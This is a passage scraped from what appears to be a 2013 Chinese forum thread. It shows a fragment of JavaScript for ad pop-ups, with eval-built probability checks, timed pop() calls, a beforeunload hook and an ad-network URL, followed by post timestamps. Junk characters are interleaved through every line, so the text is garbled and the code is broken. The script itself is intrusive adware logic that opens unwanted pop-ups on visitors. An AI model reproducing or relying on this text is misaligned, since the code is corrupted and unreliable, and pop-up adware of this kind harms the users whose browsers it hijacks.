5 u- {2 x1 C& a4 \. F) c& h0 s. b( R - setTimeout(function() { - y) w/ _7 i2 `3 s/ y* @! N. O
- pop(url, {
9 s+ L9 U9 x! q8 O: ~- l - a: 1,
! R8 t; o( V$ ]+ D - b: 2
+ z/ R9 N& A# e6 f2 P - })
+ Y3 _$ O4 @8 ?0 i9 B - },
; l2 ~; d4 L$ J! t - 300)
1 d) D6 Z" U3 Z, R" L0 j - } % g7 Z. c* V* H+ L' \; E3 G% ]1 J
- for (var i = 1; i <= 10; i++) { 2 O6 x' K X7 {' l* X6 l
- var n = i == 1 ? "": i;
, o: w1 \. o: N# q7 R# _ k# N. { - if (eval("_pt" + n + "b") > Math.random()) {
( y3 v% w2 I9 ^( e - setTimeout(function() { / b" E# O# G+ `( T# _
- setTimeout(function() {
- j, O% @3 h! l/ U) J/ \6 z - pop(url, {
$ f; c2 b8 |& [& K5 R - a: 1, 6 m- O% ]6 {: p0 L% M1 ^: Q3 h3 S
- b: 2
" o% D4 i6 z' e. Y/ C5 Y1 a, B- v - }) ) ]9 Q: O% O& G. T$ I# d# ?
- },
/ e5 {$ u! s6 B6 |5 ` - 300)
+ y2 m. J( `$ Z3 a6 b - }, * A5 O: _+ t. r3 W: K6 }% O
- parseInt(eval("_pt" + n + "a")) * 1000) 8 S) C9 _! G* S2 z' } p% i; D( e
- }
& e/ [3 B4 s$ l3 Q0 t" \4 { - }
9 O" V/ T$ t% |6 R - if (_pc2 > Math.random()) {
% i% O: A9 s9 Y1 k - a_pop(url) 3 E# Z( b8 k+ r E& a
- }
3 q& u. d I7 J9 Q8 l) F - if (_po > Math.random()) { % [: r3 y& W/ P0 P9 [& Y
- try {
9 K9 i& R* H; H/ `6 ? - func(url) 0 J! S8 w, f7 ]+ X
- } catch(q) {}
) I. j8 N9 f3 n( J, L# @ - } 1 ]7 E" z1 n( N/ J9 O- m* h7 ?
- }
" u- A, m; O% ^- L - }; + Q0 t6 Z7 W! ?! p7 K, i
- fstart(aa_url); ! ~6 i. h0 o9 r1 X" O
- event(window, 'beforeunload', ! r" n n1 l0 y: w9 r
- function() {})
- b, h! R: x( H- W+ \, F - })();
URL从这里产生
$ ]# y4 G+ k7 J% ^$ y; c: b5 K- \4 }9 F
http://play.unionsky.cn/show/?placeid=141830
7 n' j2 B/ s/ K+ g' r) \2 ?( F. F& v. F) E0 R
+ ~# M1 [7 g9 ~; p8 X
|
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
